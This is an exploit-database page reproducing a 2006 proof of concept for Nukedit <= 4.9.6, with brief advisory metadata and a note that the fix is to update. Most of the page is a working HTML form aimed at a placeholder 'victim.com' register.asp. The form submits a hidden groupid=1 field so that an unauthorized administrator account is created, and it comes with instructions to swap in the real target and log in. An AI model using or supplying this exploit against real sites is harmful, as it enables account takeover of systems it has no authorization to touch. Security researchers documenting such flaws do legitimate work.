Kapda HTML PoC For Nukedit - exploit.company

vendor:

Nukedit

by:

3nitro - farhadkey

7.5

CVSS

HIGH

Unauthorized Admin Add Exploit

264

CWE

Product Name: Nukedit

Affected Version From: <= 4.9.6

Affected Version To: <= 4.9.6

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Kapda HTML PoC For Nukedit <= 4.9.6

Nukedit is a Free Content Management. An Unauthorized Admin Add Exploit exists if the register.asp page is enabled. This exploit allows an attacker to add an admin user to the system by filling out the form and submitting it.

Mitigation:

Update to the latest version of Nukedit.

Source

Exploit-DB raw data:

################ KAPDA - Security Science Researchers Institute #################
#Advisory : http://www.kapda.ir/advisory-337.html
#Vendor : http://www.nukedit.com/
#What is : Nukedit is a Free Content Management
#Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable!
#Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir
#Vulnerabale versions : <= 4.9.6
#Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com
#Solution : update to new version of nukedit .
#Change "http://victim.com/nukedit/utilities/register.asp"
################ KAPDA - Security Science Researchers Institute #################

<html><head><title>Kapda HTML PoC For Nukedit <= 4.9.6</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head>
<body>
<font face="Verdana" Size="1"><br>
Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit<br>
Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir <br>
Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"<br>
Fill the blank and submit . After that login with your email ! + your password .<p>
<form name="frmUser" method="post" action="http://victim.com/nukedit/utilities/register.asp">
<input type="hidden" name="action" value="addDB"></p>
<br><br><br>Username :<input type="text" name="username"  size="50" style="float: left; font-family: Verdana; font-size: 7pt">
<input type="hidden" name="company"  size="30" value="MSN">
<input type="hidden" name="Url"  size="30" value="http://www.lol.ir">
<input type="hidden" name="address"  size="30" value="System32">
<input type="hidden" name="county"  size="30" value="00">
<input type="hidden" name="zip"  size="10" value="12345">
<input type="hidden" name="country" value="XPL">
<input type="hidden" name="phone"  size="15" value="12345678">
<input type="hidden" name="fax"  size="15" value="87654321">
<br><br><br>Your E-mail : <input type="text" name="email"  size="30" style="float: left; font-family: Verdana; font-size: 7pt">
<br><br><br>Your Password : <input type="password" name="password"  size="20" style="float: left; font-family: Verdana; font-size: 7pt">
<input type= "hidden" name="groupid" value="1">
<input type="hidden" name="IP" value="10.9.8.7"> 
<br><br><br><input type="submit" value="Create Account" id="submit1" name="submit1"><br>
<!-- Nukedit Exploit Discovered and coded by 3nitro (farhadkey {AT} kapda [D0T] ir) -->
</font>
</form>
</body>
</html>

# milw0rm.com [2006-05-29]